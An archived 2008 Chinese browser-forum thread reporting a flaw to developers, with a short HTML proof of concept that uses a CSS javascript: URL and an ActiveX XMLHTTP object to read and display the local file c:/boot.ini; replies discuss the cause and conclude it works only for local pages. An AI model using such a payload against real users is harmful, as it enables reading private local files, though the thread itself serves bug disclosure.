Board logo

标题: [BUG反馈] 安全浏览?形同虚设—— [打印本页]

作者: 52twb    时间: 2008-7-2 20:46     标题: 安全浏览?形同虚设——

刚才看了帖子说,2.2.0.1修补了IE的漏洞,测试了一下,很失望。
发此贴,主旨向开发组反应,不是戳TW的丑,

[ 本帖最后由 52twb 于 2008-7-2 20:49 编辑 ]
作者: 52twb    时间: 2008-7-2 20:47

测试的代码如下:
<body>
<style type="text/css">
body{background:url('javascript:XMLHTTP=new ActiveXObject("Msxml2.XMLHTTP.3.0");XMLHTTP.open("GET","c:/boot.ini",false);XMLHTTP.send();alert(XMLHTTP.responseText);')}
</style>
<img src=""></img>
</body>
作者: himmel    时间: 2008-7-2 21:00

好啊~~~~早点修复,造福用户~~~~
作者: AY    时间: 2008-7-2 21:24

这个是 IE 内核的问题,透过 safe for scripting 的 activex 控件,网页应该是不能读取本地档案的,但这样就可以:
  1. XMLHTTP=new ActiveXObject("Msxml2.XMLHTTP.3.0");
  2. XMLHTTP.open("GET","c:/boot.ini",false);
  3. XMLHTTP.send();
  4. alert(XMLHTTP.responseText);
复制代码
问题是 IE7 自己竟然又再次不受影响 ... 希望只是偶然的 ...
作者: 52twb    时间: 2008-7-2 23:21

原帖由 AY 于 2008-7-2 21:24 发表 http://bbs.ioage.com/cn/images/common/back.gif
这个是 IE 内核的问题,问题是 IE7 自己竟然又再次不受影响 ... 希望只是偶然的


IE7.0真的这么牛??
作者: mutalisker    时间: 2008-7-3 16:33

如果这个页面是在本地, 那有这样的权限会有什么问题呢?

多指教
作者: AY    时间: 2008-7-3 19:51

原帖由 mutalisker 于 2008-7-3 16:33 发表 http://bbs.ioage.com/cn/images/common/back.gif
如果这个页面是在本地, 那有这样的权限会有什么问题呢?

多指教

啊,的确是本地才有效,那应该没有什么问题了。




欢迎光临 世界之窗论坛 (http://bbs.theworld.cn./) Powered by Discuz! 7.2